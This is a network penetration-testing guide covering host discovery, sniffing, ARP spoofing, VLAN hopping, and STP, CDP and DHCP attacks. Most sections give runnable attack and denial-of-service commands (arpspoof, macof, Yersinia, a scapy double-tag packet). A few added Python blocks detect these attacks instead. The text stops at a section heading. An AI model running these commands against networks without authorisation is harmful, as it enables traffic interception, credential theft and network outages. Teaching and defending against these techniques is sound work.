Pentesting Network

Discovering hosts from the outside

This is going to be a brief section about how to find IPs responding from the Internet.
In this situation you have some scope of IPs (maybe even several ranges) and you just need to find which IPs are responding.

ICMP

This is the easiest and fastest way to discover whether a host is up or not.
You could try to send some ICMP packets and expect responses. The easiest way is just sending an echo request and expecting a response. You can do that using a simple ping or using fping for ranges.
You could also use nmap to send other types of ICMP packets (this will avoid filters on the common ICMP echo request-response).

```bash
ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
```

TCP Port Discovery

It's very common to find that all kinds of ICMP packets are being filtered. Then, all you can do to check whether a host is up is to try to find open ports. Each host has 65535 ports, so if you have a "big" scope you cannot test whether every port of every host is open or not; that would take too much time.
What you need is a fast port scanner (masscan) and a list of the most used ports:

```bash
#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24
```

You could also perform this step with nmap, but it's slower and nmap has some problems identifying hosts that are up.

HTTP Port Discovery

This is just a TCP port discovery useful when you want to focus on discovering HTTP services:

```bash
masscan -p80,443,8000-8100,8443 199.66.11.0/24
```

UDP Port Discovery

You could also try to check whether any UDP port is open to decide whether you should pay more attention to a host. As UDP services usually don't respond with any data to a regular empty UDP probe packet, it is difficult to say whether a port is filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable one based on the port number:

```bash
nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable
```

The nmap line proposed before will test the top 1000 UDP ports in every host inside the /24 range, but even just this will take >20min. If you need faster results you can use udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 This will send these UDP probes to their expected port (for a /24 range this will just take 1 min): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike, ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

SCTP Port Discovery

```bash
#Probably useless, but it's pretty fast, why not try it?
nmap -T4 -sY -n --open -Pn <IP/range>
```

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of writing:

Pentesting Wifi

Discovering hosts from the inside

If you are inside the network, one of the first things you will want to do is discover other hosts. Depending on how much noise you can/want to make, different actions can be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

```bash
netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info
```

Active

Note that the techniques described in Discovering hosts from the outside (TCP/HTTP/UDP/SCTP Port Discovery) can also be applied here. But, as you are in the same network as the other hosts, you can do more things:

```bash
#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.
```

Active ICMP

Note that the techniques described in Discovering hosts from the outside (ICMP) can also be applied here.
But, as you are in the same network as the other hosts, you can do more things:

  • If you ping a subnet broadcast address the ping should arrive at each host and they could respond to you: ping -b 10.10.5.255
  • Pinging the network broadcast address you could even find hosts inside other subnets: ping -b 255.255.255.255
  • Use the -PE, -PP, -PM flags of nmap to perform host discovery by sending ICMPv4 echo, timestamp, and subnet mask requests respectively: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lan is used to turn on computers through a network message. The magic packet used to turn on the computer is just a packet in which a destination MAC is provided and then repeated 16 times inside the same packet.
This kind of packet is usually sent in an ethernet frame of type 0x0842 or in a UDP packet to port 9.
If no [MAC] is provided, the packet is sent to the ethernet broadcast address (and the broadcast MAC will be the one being repeated).

```bash
# Bettercap (if no [MAC] is specified ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0842
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9
```

Scanning Hosts

Once you have discovered all the IPs (external or internal) you want to scan in depth, different actions can be performed.

TCP

  • Open port: SYN --> SYN/ACK --> RST
  • Closed port: SYN --> RST/ACK
  • Filtered port: SYN --> [NO RESPONSE]
  • Filtered port: SYN --> ICMP message

```bash
# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000
```

UDP

  • Send a UDP packet and check for an ICMP unreachable response if the port is closed (in several cases ICMP will be filtered, so you won't receive any information about whether the port is closed or open).
  • Send formatted datagrams to elicit a response from a service (e.g., DNS, DHCP, TFTP, and others, as listed in nmap-payloads). If you receive a response, then the port is open.

Nmap will combine both options using "-sV" (UDP scans are very slow), but note that UDP scans are slower than TCP scans:

```bash
# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time
```

SCTP Scan

SCTP (Stream Control Transmission Protocol) is designed to be used alongside TCP (Transmission Control Protocol) and UDP (User Datagram Protocol). Its main purpose is to facilitate the transport of telephony data over IP networks, mirroring many of the reliability features found in Signaling System 7 (SS7). SCTP is a core component of the SIGTRAN protocol family, which aims to transport SS7 signals over IP networks.

Support for SCTP is provided by various operating systems, such as IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, and VxWorks, indicating its broad acceptance and utility in the telecommunications and networking sectors.

nmap offers two different scans for SCTP: -sY and -sZ

```bash
# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>
```

IDS and IPS evasion

IDS and IPS Evasion

More nmap options

Nmap Summary (ESP)

Revealing Internal IP Addresses

Misconfigured routers, firewalls, and network devices sometimes respond to network probes using nonpublic source addresses. tcpdump can be used to identify packets received from private addresses during testing. Specifically, on Kali Linux, packets can be captured on the eth2 interface, which is accessible from the public Internet. It's important to note that if your setup is behind a NAT or a Firewall, such packets are likely to be filtered out.

```bash
tcpdump -nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64
```

Sniffing

By sniffing you can learn details of IP ranges, subnet sizes, MAC addresses, and hostnames by reviewing captured frames and packets. If the network is misconfigured or the switching fabric is under stress, attackers can capture sensitive material via passive network sniffing.

If a switched Ethernet network is configured properly, you will only see broadcast frames and material destined for your MAC address.

TCPDump

```bash
sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"
```

One can also capture packets from a remote machine over an SSH session, using Wireshark as the GUI in real time.

```bash
ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic
```

Bettercap

```bash
net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered
```

Wireshark

Obviously.

Capturing credentials

You can use tools like https://github.com/lgandx/PCredz to parse credentials from a pcap or a live interface.

LAN attacks

ARP spoofing

ARP Spoofing consists in sending gratuitous ARP responses to indicate that the IP of a machine has the MAC of our device. Then, the victim will update its ARP table and will contact our machine every time it wants to contact the spoofed IP.

Bettercap

```bash
arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)
```

Arpspoof

```bash
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
```
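From the defender's side, the gratuitous replies and the sudden IP-to-MAC change described above are exactly what a monitor should look for. The following is an added example (not HackTricks, Bettercap or arpspoof code): a minimal ARP parser plus a watcher that learns the first MAC seen for each IP and alerts on contradictions; the packets it consumes are constructed inline, nothing is sent on the wire.

```python
"""Detect ARP spoofing from raw Ethernet/IPv4 ARP packets (RFC 826 layout, 28 bytes)."""
import struct
from typing import Dict, List, Optional

ARP_REQUEST, ARP_REPLY = 1, 2


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def _ip(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_arp(pkt: bytes) -> Optional[dict]:
    """Parse an Ethernet/IPv4 ARP packet; return None if it is not one."""
    if len(pkt) < 28:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", pkt[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": oper, "sha": _mac(pkt[8:14]), "spa": _ip(pkt[14:18]),
            "tha": _mac(pkt[18:24]), "tpa": _ip(pkt[24:28])}


class ArpWatcher:
    """Learns the first MAC seen for each IP and reports anything that contradicts it."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}

    def observe(self, pkt: bytes) -> List[str]:
        arp = parse_arp(pkt)
        if arp is None:
            return []
        alerts: List[str] = []
        # Gratuitous reply: the sender announces its own IP, which is what the attack sends.
        if arp["op"] == ARP_REPLY and arp["spa"] == arp["tpa"]:
            alerts.append(f"gratuitous reply for {arp['spa']} from {arp['sha']}")
        known = self.table.get(arp["spa"])
        if known is None:
            self.table[arp["spa"]] = arp["sha"]
        elif known != arp["sha"]:
            alerts.append(f"{arp['spa']} changed from {known} to {arp['sha']}")
        return alerts


def build_arp(op: int, sha: str, spa: str, tha: str, tpa: str) -> bytes:
    """Constructed sample packet for the demo (a test helper, nothing is transmitted)."""
    def mac(s: str) -> bytes:
        return bytes(int(x, 16) for x in s.split(":"))

    def ip(s: str) -> bytes:
        return bytes(int(x) for x in s.split("."))

    return struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + mac(sha) + ip(spa) + mac(tha) + ip(tpa)


def demo() -> List[str]:
    """Feed one legitimate gateway reply, then the two frames a spoofer would produce."""
    w = ArpWatcher()
    gw, victim, attacker = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01", "de:ad:be:ef:00:01"
    packets = [
        build_arp(ARP_REPLY, gw, "192.168.1.1", victim, "192.168.1.2"),        # legitimate
        build_arp(ARP_REPLY, attacker, "192.168.1.1", victim, "192.168.1.2"),  # poisoned reply
        build_arp(ARP_REPLY, attacker, "192.168.1.1", "ff:ff:ff:ff:ff:ff", "192.168.1.1"),  # gratuitous
    ]
    alerts: List[str] = []
    for p in packets:
        alerts.extend(w.observe(p))
    return alerts
```

A real deployment would feed `observe()` from a pcap or a raw socket and seed `table` from a known-good inventory instead of trusting the first reply.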

MAC Flooding - CAM overflow

Overflow the switch's CAM table by sending a lot of packets with different source MAC addresses. When the CAM table is full, the switch starts behaving like a hub (broadcasting all the traffic).

```bash
macof -i <interface>
```

In modern switches this vulnerability has been fixed.

802.1Q VLAN / DTP Attacks

Dynamic Trunking

The Dynamic Trunking Protocol (DTP) is designed as a link layer protocol to facilitate an automatic system for trunking, allowing switches to automatically select ports for trunk mode (Trunk) or non-trunk mode. The deployment of DTP is often seen as indicative of suboptimal network design, underscoring the importance of manually configuring trunks only where necessary and ensuring proper documentation.

By default, switch ports are set to operate in Dynamic Auto mode, meaning they are ready to initiate trunking if prompted by a neighboring switch. A security concern arises when a pentester or attacker connects to the switch and sends a DTP Desirable frame, forcing the port into trunk mode. This action enables the attacker to enumerate VLANs through STP frame analysis and circumvent VLAN segmentation by setting up virtual interfaces.

The presence of DTP in many switches by default can be exploited by adversaries to mimic a switch's behavior, thereby gaining access to traffic across all VLANs. The script dtpscan.sh is used to monitor an interface, revealing whether the switch is in Default, Trunk, Dynamic, Auto, or Access mode, the latter being the only configuration immune to VLAN hopping attacks. This tool assesses the switch's vulnerability status.

If a network vulnerability is identified, the Yersinia tool can be used to "enable trunking" via the DTP protocol, allowing the observation of packets from all VLANs.

```bash
apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode
```

To enumerate the VLANs it is also possible to generate the DTP Desirable frame with the DTPHijacking.py script. Do not interrupt the script under any circumstances. It injects DTP Desirable every three seconds. The dynamically created trunk channels on the switch only live for five minutes. After five minutes, the trunk falls off.

```bash
sudo python3 DTPHijacking.py --interface eth0
```

I would like to point out that Access/Desirable (0x03) indicates that the DTP frame is of the Desirable type, which tells the port to switch to Trunk mode. And 802.1Q/802.1Q (0xa5) indicates the 802.1Q encapsulation type.

By analyzing the STP frames, we learn about the existence of VLAN 30 and VLAN 60.

Attacking specific VLANs

Once you know the VLAN IDs and IP values, you can configure a virtual interface to attack a specific VLAN.
If DHCP is not available, use ifconfig to set a static IP address.

```bash
root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24
```

```bash
# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up
```

```bash
# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30
```

Automatic VLAN Hopper

The discussed attack of Dynamic Trunking and creating virtual interfaces and discovering hosts inside other VLANs is automatically performed by the tool: https://github.com/nccgroup/vlan-hopping---frogger

Double Tagging

If an attacker knows the value of the MAC, IP and VLAN ID of the victim host, he could try to double tag a frame with its designated VLAN and the VLAN of the victim and send a packet. As the victim won't be able to connect back with the attacker, the best option for the attacker is to communicate via UDP to protocols that can perform some interesting actions (like SNMP).

Another option for the attacker is to launch a TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (probably through the internet). Then, the attacker could sniff on the second host owned by him to see whether it receives some packets from the victim.

To execute this attack you can use scapy: pip install scapy

```python
from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)
```
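A frame with two stacked 802.1Q tags should never arrive on an access port, so spotting it is a cheap detection. The following is an added example (not HackTricks or scapy code): a pure-Python Ethernet parser that pops every stacked tag (EtherType 0x8100 or 0x88a8) and returns the VLAN IDs outer-to-inner; the sample frame is constructed inline to match the Dot1Q(vlan=1)/Dot1Q(vlan=20) packet above.

```python
"""Parse stacked 802.1Q tags from a raw Ethernet frame and flag double tagging."""
import struct
from typing import List, Tuple

ETH_P_8021Q, ETH_P_8021AD, ETH_P_IP = 0x8100, 0x88A8, 0x0800


def parse_vlan_tags(frame: bytes) -> Tuple[str, str, List[int], int, bytes]:
    """Return (dst MAC, src MAC, VLAN IDs outer->inner, inner EtherType, payload)."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst = ":".join(f"{b:02x}" for b in frame[0:6])
    src = ":".join(f"{b:02x}" for b in frame[6:12])
    (ethertype,) = struct.unpack("!H", frame[12:14])
    offset = 14
    vlans: List[int] = []
    # Each tag is 4 bytes: the TPID we just read, then a 16-bit TCI, then the next EtherType.
    while ethertype in (ETH_P_8021Q, ETH_P_8021AD):
        if len(frame) < offset + 4:
            raise ValueError("truncated 802.1Q tag")
        tci, ethertype = struct.unpack("!HH", frame[offset:offset + 4])
        vlans.append(tci & 0x0FFF)  # low 12 bits are the VLAN ID; PCP/DEI sit above them
        offset += 4
    return dst, src, vlans, ethertype, frame[offset:]


def is_double_tagged(frame: bytes) -> bool:
    """True when more than one 802.1Q tag is stacked on the frame."""
    return len(parse_vlan_tags(frame)[2]) > 1


def build_frame(vlans: List[int], pcp: int = 0, payload: bytes = b"\x45\x00\x00\x14") -> bytes:
    """Constructed sample frame: Ether()/Dot1Q(vlan=...)/.../start of an IPv4 header."""
    out = bytearray(bytes.fromhex("ffffffffffff") + bytes.fromhex("0242ac110002"))
    for vid in vlans:
        out += struct.pack("!HH", ETH_P_8021Q, (pcp << 13) | (vid & 0x0FFF))
    out += struct.pack("!H", ETH_P_IP) + payload
    return bytes(out)


def demo() -> List[int]:
    """VLAN IDs carried by the scapy frame above: native VLAN 1 outside, target VLAN 20 inside."""
    return parse_vlan_tags(build_frame([1, 20]))[2]
```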

Lateral VLAN Segmentation Bypass

If you have access to a switch that you are directly connected to, you have the ability to bypass VLAN segmentation within the network. Simply switch the port to trunk mode (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.

Lateral VLAN Segmentation Bypass

Layer 3 Private VLAN Bypass

In certain environments, such as guest wireless networks, port isolation (also known as private VLAN) settings are implemented to prevent clients connected to a wireless access point from communicating directly with each other. However, a technique has been identified that can circumvent these isolation measures. This technique exploits either the lack of network ACLs or their improper configuration, enabling IP packets to be routed through a router to reach another client on the same network.

The attack is executed by crafting a packet that carries the destination IP address of the target client but with the router's MAC address. This causes the router to mistakenly forward the packet to the target client. This approach is similar to that used in Double Tagging Attacks, where the ability to control a host accessible to the victim is used to exploit the security flaw.

Key Steps of the Attack:

  1. Crafting a Packet: A packet is specially crafted to include the target client's IP address but with the router's MAC address.
  2. Exploiting Router Behavior: The crafted packet is sent to the router, which, due to the configuration, redirects the packet to the target client, bypassing the isolation provided by private VLAN settings.

VTP Attacks

VTP (VLAN Trunking Protocol) centralizes VLAN management. It uses revision numbers to maintain VLAN database integrity; any modification increments this number. Switches adopt configurations with higher revision numbers, updating their own VLAN databases.

VTP Domain Roles

  • VTP Server: Manages VLANs (creates, deletes, modifies). It broadcasts VTP announcements to domain members.
  • VTP Client: Receives VTP announcements to synchronize its VLAN database. This role is restricted from making VLAN configuration modifications.
  • VTP Transparent: Doesn't take part in VTP updates but forwards VTP announcements. Unaffected by VTP attacks, it maintains a constant revision number of zero.

VTP Advertisement Types

  • Summary Advertisement: Broadcast by the VTP server every 300 seconds, carrying essential domain information.
  • Subset Advertisement: Sent following a VLAN configuration change.
  • Advertisement Request: Issued by a VTP client to request a Summary Advertisement, typically in response to detecting a higher configuration revision number.

VTP vulnerabilities are exploitable exclusively via trunk ports as VTP announcements circulate solely through them. Post-DTP attack scenarios might pivot towards VTP. Tools like Yersinia can facilitate VTP attacks, aiming to wipe out the VLAN database, effectively disrupting the network.

Note: This discussion pertains to VTP version 1 (VTPv1).

```bash
yersinia -G # Launch Yersinia in graphical mode
```

In Yersinia's graphical mode, choose the deleting all VTP vlans option to purge the VLAN database.

STP Attacks

If you cannot capture BPDU frames on your interfaces, it is unlikely that you will succeed in an STP attack.

STP BPDU DoS

Sending a lot of TCP BPDUs (Topology Change Notification) or Conf BPDUs (the BPDUs that are sent when the topology is created) overloads the switches and they stop working correctly.

```bash
yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing
```

STP TCP Attack

When a TCP is sent, the CAM table of the switches will be deleted in 15s. Then, if you continuously send this kind of packets, the CAM table will be restarted continuously (or every 15 seconds) and when it is restarted, the switch behaves as a hub.

```bash
yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen
```

STP Root Attack

The attacker simulates the behaviour of a switch to become the STP root of the network. Then, more data will pass through him. This is interesting when you are connected to two different switches.
This is done by sending CONF BPDU packets claiming that the priority value is lower than the actual priority of the real root switch.

```bash
yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root
```

If the attacker is connected to 2 switches he can be the root of the new tree and all the traffic between those switches will pass through him (a MITM attack will be performed).

```bash
yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forward packages
```
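The three STP attacks in this section leave two fingerprints on the wire: a burst of TCN BPDUs and a Configuration BPDU advertising a root bridge ID lower than the one the network has been using. The following is an added example (not HackTricks or Yersinia code) of a monitor that parses IEEE 802.1D BPDUs as they appear after the LLC header (DSAP/SSAP 0x42, control 0x03) and reports both; the TCN threshold and the sample BPDUs are constructed for the example.

```python
"""Parse 802.1D BPDUs and flag TCN floods and unexpected root bridge changes."""
import struct
from typing import List, Optional, Tuple

BPDU_CONFIG, BPDU_TCN = 0x00, 0x80
LLC_STP = b"\x42\x42\x03"  # DSAP 0x42, SSAP 0x42, control 0x03 (UI)


def parse_bpdu(payload: bytes) -> Optional[dict]:
    """Parse the STP payload of an 802.3 frame (LLC + BPDU). None if it is not STP."""
    if not payload.startswith(LLC_STP):
        return None
    body = payload[3:]
    if len(body) < 4:
        return None
    proto, version, bpdu_type = struct.unpack("!HBB", body[:4])
    if proto != 0:  # protocol identifier is always 0 for STP
        return None
    if bpdu_type == BPDU_TCN:
        return {"type": "TCN"}
    if bpdu_type == BPDU_CONFIG and len(body) >= 35:
        # flags, root ID (priority + MAC), root path cost, bridge ID, port ID
        flags, root_prio, root_mac, cost, br_prio, br_mac, port = struct.unpack(
            "!BH6sIH6sH", body[4:27])
        msg_age, max_age, hello, fwd_delay = struct.unpack("!HHHH", body[27:35])
        return {"type": "CONFIG", "flags": flags,
                "root": (root_prio, root_mac.hex(":")), "cost": cost,
                "bridge": (br_prio, br_mac.hex(":")), "port": port,
                "max_age_s": max_age / 256, "hello_s": hello / 256}
    return None


class StpWatcher:
    """Tracks the learned root bridge and counts TCNs within one observation window."""

    def __init__(self, tcn_threshold: int = 5) -> None:
        self.root: Optional[Tuple[int, str]] = None
        self.tcn_count = 0
        self.tcn_threshold = tcn_threshold

    def observe(self, payload: bytes) -> List[str]:
        bpdu = parse_bpdu(payload)
        if bpdu is None:
            return []
        alerts: List[str] = []
        if bpdu["type"] == "TCN":
            self.tcn_count += 1
            if self.tcn_count == self.tcn_threshold:
                alerts.append(f"TCN flood: {self.tcn_count} topology change BPDUs")
            return alerts
        root = bpdu["root"]
        if self.root is None:
            self.root = root
        elif root < self.root:  # tuple order: lower priority wins, then lower MAC
            alerts.append(f"root changed from {self.root} to {root} "
                          f"(advertised by bridge {bpdu['bridge']})")
            self.root = root
        return alerts


def build_config_bpdu(root_prio: int, root_mac: str, bridge_prio: int,
                      bridge_mac: str, cost: int = 0) -> bytes:
    """Constructed sample Configuration BPDU (test helper, nothing is transmitted)."""
    r = bytes.fromhex(root_mac.replace(":", ""))
    b = bytes.fromhex(bridge_mac.replace(":", ""))
    body = struct.pack("!HBBBH6sIH6sH", 0, 0, BPDU_CONFIG, 0, root_prio, r, cost,
                       bridge_prio, b, 0x8001)
    body += struct.pack("!HHHH", 0, 20 * 256, 2 * 256, 15 * 256)  # timers in 1/256 s
    return LLC_STP + body


def build_tcn_bpdu() -> bytes:
    """Constructed sample Topology Change Notification BPDU."""
    return LLC_STP + struct.pack("!HBB", 0, 0, BPDU_TCN)


def demo() -> List[str]:
    """Legitimate root first, then a lower-priority root claim, then a TCN burst."""
    w = StpWatcher(tcn_threshold=3)
    out: List[str] = []
    out += w.observe(build_config_bpdu(32768, "00:1a:2b:3c:4d:5e", 32768, "00:1a:2b:3c:4d:5e"))
    out += w.observe(build_config_bpdu(0, "de:ad:be:ef:00:01", 0, "de:ad:be:ef:00:01"))
    for _ in range(3):
        out += w.observe(build_tcn_bpdu())
    return out
```

On Cisco gear the same two conditions are what root guard and BPDU guard act on; this script only observes, so it is safe to run on a SPAN port.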

CDP Attacks

CISCO Discovery Protocol (CDP) is essential for communication between CISCO devices, allowing them to identify each other and share configuration details.

Passive Data Collection

CDP is configured to broadcast information through all ports, which might lead to a security risk. An attacker, upon connecting to a switch port, could deploy network sniffers like Wireshark, tcpdump, or Yersinia. This action can reveal sensitive data about the network device, including its model and the version of Cisco IOS it runs. The attacker might then target specific vulnerabilities in the identified Cisco IOS version.

Inducing CDP Table Flooding

A more aggressive approach involves launching a Denial of Service (DoS) attack by overwhelming the switch's memory, pretending to be legitimate CISCO devices. Below is the command sequence to initiate such an attack using Yersinia, a network tool designed for testing:

```bash
sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G
```

During this attack, the switch's CPU and CDP neighbor table are heavily burdened, leading to what is often referred to as "network paralysis" due to excessive resource consumption.

CDP Impersonation Attack

```bash
sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet
```

You could also use scapy. Be sure to install it with the scapy/contrib package.

VoIP Attacks and the VoIP Hopper Tool

VoIP phones, increasingly integrated with IoT devices, offer functionalities like unlocking doors or controlling thermostats through special phone numbers. However, this integration can pose security risks.

The tool voiphopper is designed to emulate a VoIP phone in various environments (Cisco, Avaya, Nortel, Alcatel-Lucent). It discovers the voice network's VLAN ID using protocols like CDP, DHCP, LLDP-MED, and 802.1Q ARP.

VoIP Hopper offers three modes for the Cisco Discovery Protocol (CDP):

  1. Sniff Mode (-c 0): Analyzes network packets to identify the VLAN ID.
  2. Spoof Mode (-c 1): Generates custom packets mimicking those of an actual VoIP device.
  3. Spoof with Pre-made Packet Mode (-c 2): Sends packets identical to those of a specific Cisco IP phone model.

The preferred mode for speed is the third one. It requires specifying:

  • The attacker's network interface (-i parameter).
  • The name of the VoIP device being emulated (-E parameter), adhering to the Cisco naming format (e.g., SEP followed by a MAC address).

In corporate settings, to mimic an existing VoIP device, one might:

  • Inspect the MAC label on the phone.
  • Navigate the phone's display settings to view model information.
  • Connect the VoIP device to a laptop and observe the CDP requests using Wireshark.

An example command to execute the tool in the third mode would be:

```bash
voiphopper -i eth1 -E 'SEP001EEEEEEEEE' -c 2
```

DHCP Attacks

Enumeration

```bash
nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover:
|   Response 1 of 1:
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds
```

DoS

Two types of DoS can be performed against DHCP servers. The first one consists of simulating enough fake hosts to use all the possible IP addresses.
This attack will only work if you can see the responses of the DHCP server and complete the protocol (Discover (Comp) --> Offer (server) --> Request (Comp) --> ACK (server)). For example, this is not possible in Wifi networks.

Another way to perform a DHCP DoS is to send a DHCP-RELEASE packet using every possible IP as source. Then, the server will think that everybody has finished using the IP.

```bash
yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed
```

A more automatic way of doing this is using the tool DHCPing

You could use the mentioned DoS attacks to force clients to obtain new leases within the environment, and to exhaust legitimate servers so they become unresponsive. So when the legitimate clients try to reconnect, you can serve them the malicious values mentioned in the next attack.

Set malicious values

